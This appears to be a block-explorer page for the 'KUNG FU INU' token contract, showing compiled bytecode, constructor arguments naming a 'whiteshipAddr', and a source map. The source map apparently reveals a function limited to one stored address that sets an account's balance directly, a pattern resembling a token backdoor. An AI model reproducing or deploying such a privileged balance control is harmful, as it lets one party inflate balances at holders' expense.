26f206160448201526564647265737360d01b6064820152608401610436565b6001600160a01b0382166107e75760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610436565b61082481604051806060016040528060278152602001610b19602791396001600160a01b03861660009081526001602052604090205491906108a7565b6001600160a01b03808516600090815260016020526040808220939093559084168152205461085390826105e5565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906107139085815260200190565b600081848411156108cb5760405162461bcd60e51b81526004016104369190610923565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b8181101561095057858101830151858201604001528201610934565b81811115610962576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b038116811461098f57600080fd5b919050565b600080604083850312156109a757600080fd5b6109b083610978565b946020939093013593505050565b6000806000606084860312156109d357600080fd5b6109dc84610978565b92506109ea60208501610978565b9150604084013590509250925092565b600060208284031215610a0c57600080fd5b6105f182610978565b60008060008060808587031215610a2b57600080fd5b84358015158114610a3b57600080fd5b9350610a4960208601610978565b93969395505050506040820135916060013590565b60008060408385031215610a7157600080fd5b610a7a83610978565b9150610a8860208401610978565b90509250929050565b600181811c90821680610aa557607f821691505b602082108103610ac557634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b6000816000190483118215151615610afb57610afb610acb565b500290565b60008219821115610b1357610b13610acb565b50019056fe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220b214b9c9cc6c77b636789b4f0e7026414615900e4c5769c3c659127b09e38afc64736f6c634300080f0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000000120000000000000000000000000147647942fb6a60f37f8d97def50bf97986cc3d0000000000000000000000000000000000000000033b2e3c9fd0803ce8000000000000000000000000000000000000000000000000000000000000000000000b4b554e4720465520494e5500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064b5546494e550000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): KUNG FU INU
Arg [1] : symbol_ (string): KUFINU
Arg [2] : decimals_ (uint8): 18
Arg [3] : whiteshipAddr (address): 0x0147647942Fb6a60f37f8d97DEF50Bf97986Cc3d
Arg [4] : totalSupply_ (uint256): 1000000000000000000000000000

-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [3] : 0000000000000000000000000147647942fb6a60f37f8d97def50bf97986cc3d
Arg [4] : 0000000000000000000000000000000000000000033b2e3c9fd0803ce8000000
Arg [5] : 000000000000000000000000000000000000000000000000000000000000000b
Arg [6] : 4b554e4720465520494e55000000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [8] : 4b5546494e550000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

13816:5682:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14835:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15870:210;;;;;;:::i;:::-;;:::i;:::-;;;1218:14:1;;1211:22;1193:41;;1181:2;1166:18;15870:210:0;1053:187:1;15136:108:0;15224:12;;15136:108;;;1391:25:1;;;1379:2;1364:18;15136:108:0;1245:177:1;14133:31:0;;;;;;16088:455;;;;;;:::i;:::-;;:::i;15037:91::-;15111:9;;15037:91;;15111:9;;;;1902:36:1;;1890:2;1875:18;15037:91:0;1760:184:1;16551:302:0;;;;;;:::i;:::-;;:::i;14175:28::-;;;;;-1:-1:-1;;;;;14175:28:0;;;;;;-1:-1:-1;;;;;2113:32:1;;;2095:51;;2083:2;2068:18;14175:28:0;1949:203:1;15252:177:0;;;;;;:::i;:::-;-1:-1:-1;;;;;15403:18:0;15371:7;15403:18;;;:9;:18;;;;;;;15252:177;5609:94;;;:::i;:::-;;14091:31;;;;;;4958:87;5004:7;5031:6;-1:-1:-1;;;;;5031:6:0;4958:87;;14934:95;;;:::i;17640:374::-;;;;;;:::i;:::-;;:::i;15437:216::-;;;;;;:::i;:::-;;:::i;15661:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15827:18:0;;;15795:7;15827:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15661:201;5858:192;;;;;;:::i;:::-;;:::i;14835:91::-;14880:13;14913:5;14906:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14835:91;:::o;15870:210::-;15989:4;16011:39;3756:10;16034:7;16043:6;16011:8;:39::i;:::-;-1:-1:-1;16068:4:0;15870:210;;;;:::o;16088:455::-;16228:4;16245:36;16255:6;16263:9;16274:6;16245:9;:36::i;:::-;16292:221;16315:6;3756:10;16363:139;16419:6;16363:139;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16363:19:0;;;;;;:11;:19;;;;;;;;3756:10;16363:33;;;;;;;;;;:37;:139::i;:::-;16292:8;:221::i;:::-;-1:-1:-1;16531:4:0;16088:455;;;;;:::o;16551:302::-;3756:10;16666:4;16760:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16760:34:0;;;;;;;;;;16666:4;;16688:133;;16738:7;;16760:50;;16799:10;16760:38;:50::i;5609:94::-;5004:7;5031:6;-1:-1:-1;;;;;5031:6:0;3756:10;5178:23;5170:68;;;;-1:-1:-1;;;5170:68:0;;3689:2:1;5170:68:0;;;3671:21:1;;;3708:18;;;3701:30;3767:34;3747:18;;;3740:62;3819:18;;5170:68:0;;;;;;;;;5674:21:::1;5692:1;5674:9;:21::i;:::-;5609:94::o:0;14934:95::-;14981:13;15014:7;15007:14;;;;;:::i;17640:374::-;16938:11;;-1:-1:-1;;;;;16938:11:0;3756:10;-1:-1:-1;;;;;16922:27:0;;16904:77;;;;-1:-1:-1;;;16904:77:0;;4050:2:1;16904:77:0;;;4032:21:1;4089:2;4069:18;;;4062:30;4128:29;4108:18;;;4101:57;4175:18;;16904:77:0;3848:351:1;16904:77:0;17838:13:::1;:30:::0;;-1:-1:-1;;;;;;17838:30:0::1;-1:-1:-1::0;;;;;17838:30:0;::::1;;::::0;;17869:16:::1;:36:::0;;;17906:16:::1;:36:::0;;;17971:35:::1;17906:36:::0;17869;17971:35:::1;:::i;:::-;17954:13;::::0;-1:-1:-1;;;;;17954:13:0::1;17944:24;::::0;;;:9:::1;:24;::::0;;;;:62;-1:-1:-1;;;;17640:374:0:o;15437:216::-;15559:4;15581:42;3756:10;15605:9;15616:6;15581:9;:42::i;5858:192::-;5004:7;5031:6;-1:-1:-1;;;;;5031:6:0;3756:10;5178:23;5170:68;;;;-1:-1:-1;;;5170:68:0;;3689:2:1;5170:68:0;;;3671:21:1;;;3708:18;;;3701:30;3767:34;3747:18;;;3740:62;3819:18;;5170:68:0;3487:356:1;5170:68:0;-1:-1:-1;;;;;5947:22:0;::::1;5939:73;;;::::0;-1:-1:-1;;;5939:73:0;;4711:2:1;5939:73:0::1;::::0;::::1;4693:21:1::0;4750:2;4730:18;;;4723:30;4789:34;4769:18;;;4762:62;-1:-1:-1;;;4840:18:1;;;4833:36;4886:19;;5939:73:0::1;4509:402:1::0;5939:73:0::1;6023:19;6033:8;6023:9;:19::i;:::-;5858:192:::0;:::o;9044:98::-;9102:7;9129:5;9133:1;9129;:5;:::i;:::-;9122:12;9044:98;-1:-1:-1;;;9044:98:0:o;18874:382::-;-1:-1:-1;;;;;19010:19:0;;19002:69;;;;-1:-1:-1;;;19002:69:0;;5251:2:1;19002:69:0;;;5233:21:1;5290:2;5270:18;;;5263:30;5329:34;5309:18;;;5302:62;-1:-1:-1;;;5380:18:1;;;5373:35;5425:19;;19002:69:0;5049:401:1;19002:69:0;-1:-1:-1;;;;;19090:21:0;;19082:69;;;;-1:-1:-1;;;19082:69:0;;5657:2:1;19082:69:0;;;5639:21:1;5696:2;5676:18;;;5669:30;5735:34;5715:18;;;5708:62;-1:-1:-1;;;5786:18:1;;;5779:33;5829:19;;19082:69:0;5455:399:1;19082:69:0;-1:-1:-1;;;;;19164:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19216:32;;1391:25:1;;;19216:32:0;;1364:18:1;19216:32:0;;;;;;;;18874:382;;;:::o;17019:613::-;-1:-1:-1;;;;;17159:20:0;;17151:71;;;;-1:-1:-1;;;17151:71:0;;6061:2:1;17151:71:0;;;6043:21:1;6100:2;6080:18;;;6073:30;6139:34;6119:18;;;6112:62;-1:-1:-1;;;6190:18:1;;;6183:36;6236:19;;17151:71:0;5859:402:1;17151:71:0;-1:-1:-1;;;;;17241:23:0;;17233:72;;;;-1:-1:-1;;;17233:72:0;;6468:2:1;17233:72:0;;;6450:21:1;6507:2;6487:18;;;6480:30;6546:34;6526:18;;;6519:62;-1:-1:-1;;;6597:18:1;;;6590:34;6641:19;;17233:72:0;6266:400:1;17233:72:0;17398:109;17434:6;17398:109;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17398:17:0;;;;;;:9;:17;;;;;;;:109;:21;:109::i;:::-;-1:-1:-1;;;;;17378:17:0;;;;;;;:9;:17;;;;;;:129;;;;17541:20;;;;;;;:32;;17566:6;17541:24;:32::i;:::-;-1:-1:-1;;;;;17518:20:0;;;;;;;:9;:20;;;;;;;:55;;;;17589:35;;;;;;;;;;17617:6;1391:25:1;;1379:2;1364:18;;1245:177;11323:240:0;11443:7;11504:12;11496:6;;;;11488:29;;;;-1:-1:-1;;;11488:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11539:5:0;;;11323:240::o;6058:173::-;6114:16;6133:6;;-1:-1:-1;;;;;6150:17:0;;;-1:-1:-1;;;;;;6150:17:0;;;;;;6183:40;;6133:6;;;;;;;6183:40;;6114:16;6183:40;6103:128;6058:173;:::o;14:597:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;452:6;449:1;446:13;443:91;;;522:1;517:2;508:6;497:9;493:22;489:31;482:42;443:91;-1:-1:-1;595:2:1;574:15;-1:-1:-1;;570:29:1;555:45;;;;602:2;551:54;;14:597;-1:-1:-1;;;14:597:1:o;616:173::-;684:20;;-1:-1:-1;;;;;733:31:1;;723:42;;713:70;;779:1;776;769:12;713:70;616:173;;;:::o;794:254::-;862:6;870;923:2;911:9;902:7;898:23;894:32;891:52;;;939:1;936;929:12;891:52;962:29;981:9;962:29;:::i;:::-;952:39;1038:2;1023:18;;;;1010:32;;-1:-1:-1;;;794:254:1:o;1427:328::-;1504:6;1512;1520;1573:2;1561:9;1552:7;1548:23;1544:32;1541:52;;;1589:1;1586;1579:12;1541:52;1612:29;1631:9;1612:29;:::i;:::-;1602:39;;1660:38;1694:2;1683:9;1679:18;1660:38;:::i;:::-;1650:48;;1745:2;1734:9;1730:18;1717:32;1707:42;;1427:328;;;;;:::o;2157:186::-;2216:6;2269:2;2257:9;2248:7;2244:23;2240:32;2237:52;;;2285:1;2282;2275:12;2237:52;2308:29;2327:9;2308:29;:::i;2348:484::-;2431:6;2439;2447;2455;2508:3;2496:9;2487:7;2483:23;2479:33;2476:53;;;2525:1;2522;2515:12;2476:53;2564:9;2551:23;2617:5;2610:13;2603:21;2596:5;2593:32;2583:60;;2639:1;2636;2629:12;2583:60;2662:5;-1:-1:-1;2686:38:1;2720:2;2705:18;;2686:38;:::i;:::-;2348:484;;2676:48;;-1:-1:-1;;;;2771:2:1;2756:18;;2743:32;;2822:2;2807:18;2794:32;;2348:484::o;2837:260::-;2905:6;2913;2966:2;2954:9;2945:7;2941:23;2937:32;2934:52;;;2982:1;2979;2972:12;2934:52;3005:29;3024:9;3005:29;:::i;:::-;2995:39;;3053:38;3087:2;3076:9;3072:18;3053:38;:::i;:::-;3043:48;;2837:260;;;;;:::o;3102:380::-;3181:1;3177:12;;;;3224;;;3245:61;;3299:4;3291:6;3287:17;3277:27;;3245:61;3352:2;3344:6;3341:14;3321:18;3318:38;3315:161;;3398:10;3393:3;3389:20;3386:1;3379:31;3433:4;3430:1;3423:15;3461:4;3458:1;3451:15;3315:161;;3102:380;;;:::o;4204:127::-;4265:10;4260:3;4256:20;4253:1;4246:31;4296:4;4293:1;4286:15;4320:4;4317:1;4310:15;4336:168;4376:7;4442:1;4438;4434:6;4430:14;4427:1;4424:21;4419:1;4412:9;4405:17;4401:45;4398:71;;;4449:18;;:::i;:::-;-1:-1:-1;4489:9:1;;4336:168::o;4916:128::-;4956:3;4987:1;4983:6;4980:1;4977:13;4974:39;;;4993:18;;:::i;:::-;-1:-1:-1;5029:9:1;;4916:128::o

Swarm Source

ipfs://b214b9c9cc6c77b636789b4f0e7026414615900e4c5769c3c659127b09e38afc
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.